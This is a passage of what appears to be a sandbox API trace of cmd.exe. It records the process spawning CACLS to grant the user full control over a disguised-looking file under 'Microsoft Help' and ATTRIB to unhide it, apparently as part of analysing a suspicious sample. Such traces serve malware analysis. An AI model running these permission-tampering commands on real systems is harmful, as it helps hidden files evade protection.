lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x1000) returned 0x2 [0196.588] RegCloseKey (hKey=0x40) returned 0x0 [0196.588] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eae4 | out: phkResult=0x20eae4*=0x40) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x40, lpcbData=0x20eae8*=0x1000) returned 0x2 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x1, lpcbData=0x20eae8*=0x1000) returned 0x2 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x0, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x9, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.588] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x4, lpData=0x20eaf0*=0x9, lpcbData=0x20eae8*=0x4) returned 0x0 [0196.589] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20eaec, lpData=0x20eaf0, lpcbData=0x20eae8*=0x1000 | out: lpType=0x20eaec*=0x0, lpData=0x20eaf0*=0x9, lpcbData=0x20eae8*=0x1000) returned 0x2 [0196.589] RegCloseKey (hKey=0x40) returned 0x0 [0196.589] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639e [0196.589] srand (_Seed=0x5b88639e) [0196.589] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"" [0196.589] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"" [0196.589] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.589] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a19a0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0196.589] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0196.589] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0196.589] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.589] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0196.589] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0196.589] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0196.589] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0196.589] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0196.589] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0196.589] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0196.589] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0196.589] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0196.590] GetEnvironmentStringsW () returned 0x3a2390* [0196.590] FreeEnvironmentStringsW (penv=0x3a2390) returned 1 [0196.590] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.590] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0196.590] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0196.590] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0196.590] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0196.590] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0196.590] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0196.590] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0196.590] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0196.590] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0196.590] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f8b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.590] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f8b0, lpFilePart=0x20f8ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f8ac*="Desktop") returned 0x18 [0196.590] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.590] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f62c | out: lpFindFileData=0x20f62c) returned 0x3a0a20 [0196.590] FindClose (in: hFindFile=0x3a0a20 | out: hFindFile=0x3a0a20) returned 1 [0196.590] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f62c | out: lpFindFileData=0x20f62c) returned 0x3a0a20 [0196.590] FindClose (in: hFindFile=0x3a0a20 | out: hFindFile=0x3a0a20) returned 1 [0196.590] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f62c | out: lpFindFileData=0x20f62c) returned 0x3a0a20 [0196.591] FindClose (in: hFindFile=0x3a0a20 | out: hFindFile=0x3a0a20) returned 1 [0196.591] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0196.591] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0196.591] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0196.591] GetEnvironmentStringsW () returned 0x3a0240* [0196.591] FreeEnvironmentStringsW (penv=0x3a0240) returned 1 [0196.591] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0196.591] GetConsoleOutputCP () returned 0x1b5 [0196.591] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.591] GetUserDefaultLCID () returned 0x409 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f9f0, cchData=128 | out: lpLCData="0") returned 2 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f9f0, cchData=128 | out: lpLCData="0") returned 2 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f9f0, cchData=128 | out: lpLCData="1") returned 2 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0196.592] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0196.592] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0196.593] GetConsoleTitleW (in: lpConsoleTitle=0x390950, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.593] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.593] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0196.593] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0196.593] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0196.594] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0196.594] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0196.594] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0196.594] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0196.594] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0196.594] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0196.594] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0196.595] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0196.597] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0196.597] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0196.597] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0196.597] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0196.597] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0196.597] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0196.597] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0196.599] GetConsoleTitleW (in: lpConsoleTitle=0x20f684, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.599] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0196.599] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0196.599] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0196.599] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0196.599] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0196.599] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0196.599] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0196.599] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0196.599] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0196.599] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0196.599] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0196.599] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0196.599] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0196.599] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0196.599] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0196.599] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0196.599] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0196.599] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0196.599] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0196.599] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0196.599] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0196.599] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0196.599] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0196.599] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0196.599] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0196.599] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0196.599] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0196.599] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0196.599] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0196.600] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0196.600] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0196.600] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0196.600] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0196.600] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0196.600] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0196.600] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0196.600] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0196.600] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0196.600] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0196.600] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0196.600] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0196.600] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0196.600] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0196.600] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0196.600] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0196.600] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0196.600] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0196.600] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0196.600] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0196.600] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0196.600] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0196.600] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0196.600] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0196.600] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0196.600] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0196.600] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0196.600] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0196.600] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0196.600] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0196.600] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0196.600] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0196.600] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0196.600] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0196.600] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0196.600] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0196.600] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0196.600] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0196.600] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0196.600] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0196.600] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0196.600] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0196.600] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0196.601] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0196.601] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0196.601] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0196.601] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0196.601] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0196.601] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0196.601] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0196.601] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0196.601] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0196.601] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0196.601] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0196.601] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0196.601] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0196.601] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0196.601] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0196.601] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0196.601] SetErrorMode (uMode=0x0) returned 0x0 [0196.601] SetErrorMode (uMode=0x1) returned 0x0 [0196.601] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3a1dd0, lpFilePart=0x20f1a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f1a4*="Desktop") returned 0x18 [0196.601] SetErrorMode (uMode=0x0) returned 0x1 [0196.602] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0196.602] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0196.606] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0196.607] FindClose (in: hFindFile=0x390ed8 | out: hFindFile=0x390ed8) returned 1 [0196.607] FindClose (in: hFindFile=0x390ed8 | out: hFindFile=0x390ed8) returned 1 [0196.607] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0196.607] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0196.608] GetConsoleTitleW (in: lpConsoleTitle=0x20f418, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0196.767] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f2a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f368 | out: lpAttributeList=0x20f2a0, lpSize=0x20f368) returned 1 [0196.767] UpdateProcThreadAttribute (in: lpAttributeList=0x20f2a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f360, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f2a0, lpPreviousValue=0x0) returned 1 [0196.767] GetStartupInfoW (in: lpStartupInfo=0x20f25c | out: lpStartupInfo=0x20f25c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0196.767] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0196.768] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f2fc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f348 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x20f348*(hProcess=0x50, hThread=0x4c, dwProcessId=0x458, dwThreadId=0xc10)) returned 1 [0196.971] CloseHandle (hObject=0x4c) returned 1 [0196.971] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0196.971] GetEnvironmentStringsW () returned 0x3a0240* [0196.971] FreeEnvironmentStringsW (penv=0x3a0240) returned 1 [0196.971] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0197.174] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20f23c | out: lpExitCode=0x20f23c*=0x0) returned 1 [0197.174] CloseHandle (hObject=0x50) returned 1 [0197.174] _vsnwprintf (in: _Buffer=0x20f384, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f248 | out: _Buffer="00000000") returned 8 [0197.174] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0197.174] GetEnvironmentStringsW () returned 0x3a22f8* [0197.174] FreeEnvironmentStringsW (penv=0x3a22f8) returned 1 [0197.174] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0197.174] GetEnvironmentStringsW () returned 0x3a22f8* [0197.174] FreeEnvironmentStringsW (penv=0x3a22f8) returned 1 [0197.174] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f2a0 | out: lpAttributeList=0x20f2a0) [0197.174] GetConsoleTitleW (in: lpConsoleTitle=0x20f684, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.175] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0197.175] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0197.175] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0197.175] FindClose (in: hFindFile=0x39e438 | out: hFindFile=0x39e438) returned 1 [0197.175] FindClose (in: hFindFile=0x39e438 | out: hFindFile=0x39e438) returned 1 [0197.175] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0197.175] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0197.175] GetConsoleTitleW (in: lpConsoleTitle=0x20f418, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0197.175] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f2a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f368 | out: lpAttributeList=0x20f2a0, lpSize=0x20f368) returned 1 [0197.175] UpdateProcThreadAttribute (in: lpAttributeList=0x20f2a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f360, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f2a0, lpPreviousValue=0x0) returned 1 [0197.175] GetStartupInfoW (in: lpStartupInfo=0x20f25c | out: lpStartupInfo=0x20f25c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0197.176] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0197.176] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x20f2fc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f348 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft Help\\Hx_1033_MValidator.Lck\"", lpProcessInformation=0x20f348*(hProcess=0x4c, hThread=0x50, dwProcessId=0xc58, dwThreadId=0x678)) returned 1 [0197.177] CloseHandle (hObject=0x50) returned 1 [0197.177] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0197.177] GetEnvironmentStringsW () returned 0x3a22f8* [0197.177] FreeEnvironmentStringsW (penv=0x3a22f8) returned 1 [0197.177] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0197.235] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x20f23c | out: lpExitCode=0x20f23c*=0x0) returned 1 [0197.235] CloseHandle (hObject=0x4c) returned 1 [0197.235] _vsnwprintf (in: _Buffer=0x20f384, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f248 | out: _Buffer="00000000") returned 8 [0197.235] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0197.235] GetEnvironmentStringsW () returned 0x3a22f8* [0197.235] FreeEnvironmentStringsW (penv=0x3a22f8) returned 1 [0197.235] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0197.235] GetEnvironmentStringsW () returned 0x3a22f8* [0197.235] FreeEnvironmentStringsW (penv=0x3a22f8) returned 1 [0197.235] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f2a0 | out: lpAttributeList=0x20f2a0) [0197.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.235] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0197.235] _get_osfhandle (_FileHandle=1) returned 0x7 [0197.235] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0197.236] _get_osfhandle (_FileHandle=0) returned 0x3 [0197.236] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0197.236] SetConsoleInputExeNameW () returned 0x1 [0197.236] GetConsoleOutputCP () 